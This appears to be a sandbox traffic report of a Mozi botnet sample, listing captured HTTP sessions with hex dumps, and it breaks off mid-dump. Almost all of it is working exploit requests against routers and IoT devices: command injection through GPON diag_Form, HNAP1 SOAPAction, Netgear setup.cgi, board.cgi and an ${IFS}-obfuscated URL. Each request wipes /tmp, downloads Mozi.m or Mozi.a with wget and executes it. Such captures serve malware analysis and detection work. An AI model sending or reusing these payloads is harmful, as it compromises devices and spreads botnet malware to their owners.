                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:06.991828918 CEST123OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:09.863321066 CEST131OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:15.598114014 CEST189OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:27.067831993 CEST252OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:50.007033110 CEST399OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 21:00:35.949707031 CEST628OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        10192.168.2.2047166121.127.241.10881
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:49.521310091 CEST396OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        11192.168.2.2050256217.182.243.6780
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:56.119661093 CEST429OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 217.182.243.67:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        12192.168.2.2042672146.184.165.45555
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:07.155503988 CEST476OUTPOST /UD/act?1 HTTP/1.1
                                                                                                                        Host: 127.0.0.1:5555
                                                                                                                        User-Agent: Hello, world
                                                                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61
                                                                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoa


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        13192.168.2.2044594170.246.231.23980
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:07.314312935 CEST477OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:00:07.573455095 CEST477INHTTP/1.1 403 Forbidden
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 106
                                                                                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        14192.168.2.204194645.65.120.5580
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:14.175795078 CEST509OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 45.65.120.55:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 21:00:25.102366924 CEST575INHTTP/1.1 400 Bad Request
                                                                                                                        Date: Sun, 25 Apr 2021 19:00:14 GMT
                                                                                                                        Server: Apache/2.2.15 (CentOS)
                                                                                                                        Content-Length: 304
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 36 35 2e 31 32 30 2e 35 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.15 (CentOS) Server at 45.65.120.55 Port 80</address></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        15192.168.2.205675050.66.70.6880
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:14.217008114 CEST510OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 21:00:14.411174059 CEST511INHTTP/1.1 403 Forbidden


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        16192.168.2.2056268115.87.204.8981
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:21.243808031 CEST551OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                                                                                                                        Apr 25, 2021 21:00:21.483022928 CEST551INHTTP/1.1 404 Not Found
                                                                                                                        CONNECTION: close
                                                                                                                        CONTENT-LENGTH: 48
                                                                                                                        CONTENT-TYPE: text/html
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <html><body><h1>404 Not Found</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        17192.168.2.2044880183.114.91.828080
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:21.312222004 CEST551OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                                        Data Raw:
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        18192.168.2.203581435.244.243.21580
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:24.088536978 CEST570OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 35.244.243.215:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 21:00:24.147694111 CEST572INHTTP/1.0 404 Not Found
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Referrer-Policy: no-referrer
                                                                                                                        Content-Length: 1567
                                                                                                                        Date: Sun, 25 Apr 2021 19:00:24 GMT
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 